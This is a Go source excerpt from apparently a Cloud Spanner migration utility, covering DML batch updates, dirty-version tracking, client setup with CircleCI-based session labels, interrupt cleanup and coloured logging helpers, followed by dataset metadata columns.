func applyDmlStatements(ctx context.Context, spannerClient *spanner.Client, currentDmlMigrationVersion, nextDmlMigrationVersion int64, statements []spanner.Statement) {
logInfo(fmt.Sprintf("Applying DML migrations from version '%d' to version '%d': %v", currentDmlMigrationVersion, nextDmlMigrationVersion, statements))
_, err := spannerClient.ReadWriteTransaction(ctx, func(ctx context.Context, txn *spanner.ReadWriteTransaction) error {
rowCounts, err := txn.BatchUpdate(ctx, statements)
if err != nil {
return err
}
logInfo(fmt.Sprintf("Applied DML migrations from version '%d' to version '%d'. Updated row counts '%d'", currentDmlMigrationVersion, nextDmlMigrationVersion, rowCounts))
return nil
})
if err != nil {
logFatal(fmt.Sprintf("Failed applying DML migrations from version '%d' to version '%d': %v", currentDmlMigrationVersion, nextDmlMigrationVersion, err))
}
}
func setDataMigrationsDirty(ctx context.Context, spannerClient *spanner.Client, version int64) {
logInfo(fmt.Sprintf("Inserting version '%d' in DataMigrations table as dirty", version))
_, err := spannerClient.ReadWriteTransaction(ctx, func(ctx context.Context, txn *spanner.ReadWriteTransaction) error {
stmt := spanner.Statement{
SQL: "INSERT DataMigrations (Dirty, Version) VALUES (@dirty, @version)",
Params: map[string]interface{}{
"dirty": true,
"version": version,
},
}
rowCount, err := txn.Update(ctx, stmt)
if err != nil {
return err
}
logInfo(fmt.Sprintf("Inserted version '%d' in DataMigrations table as dirty. Updated row count '%d'", version, rowCount))
return nil
})
if err != nil {
logFatal(fmt.Sprintf("Failed inserting version '%d' in DataMigrations table as dirty: %v", version, err))
}
}
// SPANNER >--------------------------------------------------
func newSpannerClient(ctx context.Context, databseConnection string) (*spanner.Client, *database.DatabaseAdminClient) {
logDebug(fmt.Sprintf("Initializing spanner data and admin clients"))
circleciProjectRepoName := os.Getenv("CIRCLE_PROJECT_REPONAME")
circleci := circleciProjectRepoName != ""
var runtimeLabel string
if circleci {
runtimeLabel = fmt.Sprintf("%s-%s", circleciProjectRepoName, os.Getenv("CIRCLE_SHA1")[:7])
} else {
runtimeLabel = os.Getenv("USER")
}
minOpenedSessions := 2
writeSessions := .5
sessionId := strings.ToLower(pseudoUuid())
sessionLocation := runtimeLabel
// If the protocol is not met (https://cloud.google.com/spanner/docs/reference/rpc/google.spanner.v1#session) the following error is generated
// -> spanner: code = "InvalidArgument", desc = "Invalid CreateSession request."
spannerClientConfig := spanner.ClientConfig{
SessionPoolConfig: spanner.SessionPoolConfig{
MinOpened: uint64(minOpenedSessions),
WriteSessions: writeSessions,
},
SessionLabels: map[string]string{
"id": sessionId,
"location": sessionLocation,
},
}
logDebug(fmt.Sprintf("Creating spanner client using connection string %q, minOpenedSessions '%d', sessionId %q, sessionLocation %q", databseConnection, minOpenedSessions, sessionId, sessionLocation))
spannerClient, err := spanner.NewClientWithConfig(ctx, databseConnection, spannerClientConfig)
if err != nil {
logFatal(fmt.Sprintf("Failed initializing spanner data client for connection %q: %v", databseConnection, err))
}
spannerAdminClient, err := database.NewDatabaseAdminClient(ctx)
if err != nil {
logFatal(fmt.Sprintf("Failed initializing spanner admin client: %v", err))
}
logDebug(fmt.Sprintf("Initialized spanner data and admin clients"))
return spannerClient, spannerAdminClient
}
// SPANNER <--------------------------------------------------
// CLEANUP >--------------------------------------------------
type Closable interface {
Close()
}
func cleanUpAndExitOnInterrupt(closables []Closable) {
c := make(chan os.Signal)
signal.Notify(c, os.Interrupt, syscall.SIGTERM)
go func() {
<-c
logInfo(fmt.Sprintf("Running clean up"))
for _, v := range closables {
v.Close()
}
logInfo(fmt.Sprintf("Cleaned"))
os.Exit(0)
}()
}
// CLEANUP <--------------------------------------------------
// MISC >--------------------------------------------------
func pseudoUuid() (uuid string) {
b := make([]byte, 16)
_, err := rand.Read(b)
if err != nil {
logFatal(fmt.Sprintf("Failed gnerating UUID: %v", err))
return
}
uuid = fmt.Sprintf("%X-%X-%X-%X-%X", b[0:4], b[4:6], b[6:8], b[8:10], b[10:])
return
}
func replaceWhiteSpaceWithSpace(str string) string {
s := strings.Map(func(r rune) rune {
if unicode.IsSpace(r) {
return ' '
}
return r
}, str)
return strings.TrimSpace(strings.Join(strings.Fields(s), " "))
}
// MISC <--------------------------------------------------
// LOGGING >--------------------------------------------------
func newDefaultLogger(debug bool) *logger {
log.SetFlags(log.Flags() &^ (log.Ldate | log.Ltime))
return &logger{
debug: debug,
debugLogger: log.New(os.Stdout, fmt.Sprintf("\x1b[%dmDEBUG ", colorDebug), log.Ldate|log.Ltime|log.Lmicroseconds),
infoLogger: log.New(os.Stdout, fmt.Sprintf("\x1b[%dmINFO ", colorInfo), log.Ldate|log.Ltime|log.Lmicroseconds),
warnLogger: log.New(os.Stderr, fmt.Sprintf("\x1b[%dmWARN ", colorWarn), log.Ldate|log.Ltime|log.Lmicroseconds),
errorLogger: log.New(os.Stderr, fmt.Sprintf("\x1b[%dmERROR ", colorError), log.Ldate|log.Ltime|log.Lmicroseconds),
fatalLogger: log.New(os.Stderr, fmt.Sprintf("\x1b[%dmFATAL ", colorFatal), log.Ldate|log.Ltime|log.Lmicroseconds),
}
}
type logger struct {
debug bool
debugLogger *log.Logger
infoLogger *log.Logger
warnLogger *log.Logger
errorLogger *log.Logger
fatalLogger *log.Logger
}
func logDebug(message string) {
if l.debug {
doLog(SeverityDebug, message)
}
}
func logInfo(message string) {
doLog(SeverityInfo, message)
}
func logNotice(message string) {
doLog(SeverityNotice, message)
}
func logWarn(message string) {
doLog(SeverityWarning, message)
}
func logError(message string) {
doLog(SeverityError, message)
}
func logFatal(message string) {
doLog(SeverityEmergency, message)
}
func doLog(severity Severity, message string) {
pc, fileName, lineNumber, _ := runtime.Caller(2)
line := "line " + strconv.Itoa(lineNumber)
functionName := runtime.FuncForPC(pc).Name()
var logger *log.Logger
switch severity {
case SeverityDebug:
logger = l.debugLogger
case SeverityInfo, SeverityNotice:
logger = l.infoLogger
case SeverityWarning:
logger = l.warnLogger
case SeverityError:
logger = l.errorLogger
case SeverityEmergency:
logger = l.fatalLogger
logger.Panicln(fmtStdLog(message, functionName, line, fileName))
return
default:
logger = l.errorLogger
message = "MISSING LOG LEVEL, USING ERROR => " + message
}
logger.Println(fmtStdLog(message, functionName, line, fileName))
}
func fmtStdLog(message, functionName, line, fileName string) string {
message = fmt.Sprintf("%s %s %s %s", message, functionName, line, fileName)
return fmt.Sprintf("%s\x1b[0m", message)
}
// LOGGING <--------------------------------------------------
| [
"\"CIRCLE_PROJECT_REPONAME\"",
"\"CIRCLE_SHA1\"",
"\"USER\""
]
| []
| [
"CIRCLE_PROJECT_REPONAME",
"USER",
"CIRCLE_SHA1"
]
| [] | ["CIRCLE_PROJECT_REPONAME", "USER", "CIRCLE_SHA1"] | go | 3 | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.